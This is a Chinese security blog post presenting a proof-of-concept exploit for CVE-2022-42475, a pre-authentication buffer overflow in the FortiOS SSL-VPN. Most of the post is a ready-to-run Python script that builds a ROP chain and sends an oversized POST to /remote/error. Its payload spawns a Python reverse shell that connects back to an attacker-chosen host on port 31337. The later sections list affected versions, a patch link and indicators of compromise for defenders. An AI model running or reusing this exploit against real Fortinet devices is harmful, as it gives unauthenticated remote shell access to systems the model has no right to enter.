探索网络安全新技术
攀登黑客技术最高峰

CVE-2022-42475 Fortinet(飞塔)VPN远程RCE漏洞 POC

CVE-2022-42475 Fortinet(飞塔)VPN远程RCE漏洞 POC-威武网安

漏洞名称

CVE-2022-42475 飞塔RCE漏洞 POC

漏洞成因

由于sslvpn对用户输入的内容验证存在缺陷,未经身份验证的攻击者通过发送特制数据包触发缓冲区溢出,最终可实现在目标系统上执行任意代码。

POC

import socket
import ssl
from pwn import *
import time
import sys
import requests

context = ssl.SSLContext()
target_host = sys.argv[1]
target_port = sys.argv[2]
reverse = sys.argv[3]
params = sys.argv[4].split(" ")
strparams = "["
for param in params:
    strparams += "'"+param+"',"
strparams = strparams[:-1]
strparams += "]"


#binary functions
execve = p64(0x0042e050)

#binary gadgets
movrdirax = p64(0x00000000019d2196)# : mov rdi, rax ; call r13
poprsi = p64(0x000000000042f0f8)# : pop rsi ; ret)
poprdx = p64(0x000000000042f4a5)# : pop rdx ; ret)
jmprax = p64(0x0000000000433181)#: jmp rax)
pops = p64(0x000000000165cfd7)# : pop rdx ; pop rbx ; pop r12 ; pop r13 ; pop rbp ; ret)
poprax = p64(0x00000000004359af)# : pop rax ; ret)
gadget1 = p64(0x0000000001697e0d); #0x0000000001697e0d : push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret
poprdi = p64(0x000000000042ed7e)# : pop rdi ; ret
rax3 = gadget1



#hardcoded value which would probably need to be bruteforced or leaked
hardcoded = 0x00007fc5f128e000

scbase = p64(hardcoded)
rdi = p64(hardcoded + 0xc48)
cmd = p64(hardcoded + 0xd38)
asdf = hardcoded + 0xd38
cmd1 = p64(asdf)
cmd2 = p64(asdf+16)
arg1 = p64(asdf+48)
arg2 = p64(asdf+56)
arg3 = p64(asdf+64)

ropchain = poprax
ropchain += execve
ropchain += poprdi
ropchain += cmd1
ropchain += poprsi
ropchain += cmd2
ropchain += poprdx
ropchain += p64(0)
ropchain += jmprax
ropchain += b"/bin/python\x00\x00\x00\x00\x00"
ropchain += arg1
ropchain += arg2
ropchain += arg3
ropchain += p64(0)
ropchain += b"python\x00\x00"
ropchain += b"-c\x00\x00\x00\x00\x00\x00"
ropchain += b"""import socket,sys,os\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect(('"""+ reverse.encode() + b"""',31337))\n[os.dup2(s.fileno(),x) for x in range(3)]\ni=os.fork()\nif i==0:\n os.execve('/bin/sh', """+strparams.encode()+b""",{})\n\x00\x00"""



try:
    with socket.create_connection((target_host, int(target_port,10))) as sock:
        with context.wrap_socket(sock, server_hostname=target_host) as ssock:
            ssock.settimeout(2)
            context.verify_mode = ssl.CERT_NONE
            payload = b"A"*173096+rdi+poprdi+cmd+pops+b"A"*40+pops+rax3+b"C"*32+ropchain
            tosend = b"POST /remote/error HTTP/1.1\r\nHost: "+target_host +b"\r\nContent-Length: 115964117980\r\n\r\n" + payload
            ssock.sendall(tosend)
            r = ssock.recv(10024)
except Exception as e:
    print("Exception occurred :"+ repr(e))

受影响版本

2.0 <= FortiOS <= 7.2.2
0.0 <= FortiOS <= 7.0.8
4.0 <= FortiOS <= 6.4.10
2.0 <= FortiOS <= 6.2.11
0.0 <= FortiOS-6K7K <= 7.0.7
4.0 <= FortiOS-6K7K <= 6.4.9
2.0 <= FortiOS-6K7K <= 6.2.11
0.0 <= FortiOS-6K7K <= 6.0.14

不受影响版本

FortiOS >= 7.2.3
FortiOS >= 7.0.9
FortiOS >= 6.4.11
FortiOS >= 6.2.12
FortiOS-6K7K >= 7.0.8
FortiOS-6K7K >= 6.4.10
FortiOS-6K7K >= 6.2.12
FortiOS-6K7K >= 6.0.15

修复方案

目前官方已发布安全版本修复此漏洞
建议受影响的用户及时升级防护:
https://docs.fortinet.com/product/fortigate/7.2

IOC进行自查

检查系统中是否存在以下日志条目:

Logdesc=”Application crashed” and msg=”[…] application:sslvpnd,[…], Signal 11 received, Backtrace: […]”

检查系统中是否存在以下文件

/data/lib/libips.bak
/data/lib/libgif.so
/data/lib/libiptcp.so
/data/lib/libipudp.so
/data/lib/libjepg.so
/var/.sslvpnconfigbk
/data/etc/wxd.conf
/flash

用户可通过以下命令来对上述文件进行检查:

diagnose sys last-modified-files /data/lib
diagnose sys last-modified-files /var/
diagnose sys last-modified-files /data/etc/
diagnose sys last-modified-files /flash
赞(1) 打赏
版权声明:本文采用知识共享 署名4.0国际许可协议 [BY-NC-SA] 进行授权
文章名称:《CVE-2022-42475 Fortinet(飞塔)VPN远程RCE漏洞 POC》
文章链接:https://www.wevul.com/116.html
本站所有内容均来自互联网,只限个人技术研究,禁止商业用途,请下载后24小时内删除。

评论 抢沙发

如果文章对你有帮助 可以打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫打赏

微信扫一扫打赏

登录

找回密码

注册